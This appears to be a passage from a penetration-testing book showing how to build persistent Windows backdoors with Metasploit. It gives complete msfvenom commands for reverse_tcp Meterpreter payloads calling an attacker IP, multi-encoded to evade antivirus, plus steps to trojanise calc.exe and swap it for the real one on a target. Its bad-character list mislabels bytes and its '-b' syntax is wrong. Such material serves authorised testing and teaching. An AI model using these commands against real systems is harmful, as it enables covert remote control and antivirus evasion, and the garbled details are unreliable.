The Metasploit framework can be used to create a standalone executable that can persist on a compromised system and allow interactive communications. The advantage of a standalone package is that it can be prepared and tested in advance to ensure connectivity, and encoded to bypass local antivirus software:

1. To make a simple standalone agent, use msfvenom. In the example shown in the following screenshot, the agent is configured to use a reverse_tcp shell that will connect to the localhost at the attacker's IP on port 443:

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=192.168.0.109 lport=443 -e x86/shikata_ga_nai -i 5 -f exe -o attack1.exe

The agent, named attack1.exe, will use a Win32 executable template:

This encodes the attack1.exe agent five times using the x86/shikata_ga_nai protocol. Each time it is re-encoded, it becomes more difficult to detect. However, the executable also increases in size.

We can configure the encoding pattern in msfvenom by using -b x64/other to avoid certain characters. For example, the following characters should be avoided when encoding a persistent agent because they may result in discovery and the failure of the attack:

• • x00: Represents a 0-byte address
  • xa0: Represents a line feed
  • xad: Represents a carriage return

2. To create a multi-encoded payload, use the following command:

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=192.168.0.109 lport=443 -e x86/shikata_ga_nai -i 8 raw | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/bloxor -i 9 -f exe -o multiencoded.exe

3. You can also encode msfvenom to an existing executable, and both the modified executable and the persistent agent will function. To bind the persistent agent to an executable such as a calculator (calc.exe), first copy the appropriate calc.exe file into Kali Linux. You can download it from your existing session using Meterpreter by running meterpreter > download c:\windows\system32\calc.exe.
4. When the file is downloaded, run the following command:

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=192.168.0.109 lport=443 -x /root/calc.exe -k -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/bloxor -i 9 -f exe -o calc.exe

5. The agent can be placed on the target system, renamed calc.exe (to replace the original calculator), and then executed.

Unfortunately, nearly all Metasploit-encoded executables can be detected by client antivirus software. This has been attributed to penetration testers who have submitted encrypted payloads to sites such as VirusTotal (www.virustotal.com). However, you can create an executable and then encrypt it using Veil-Evasion, as described in Chapter 10, Exploitation.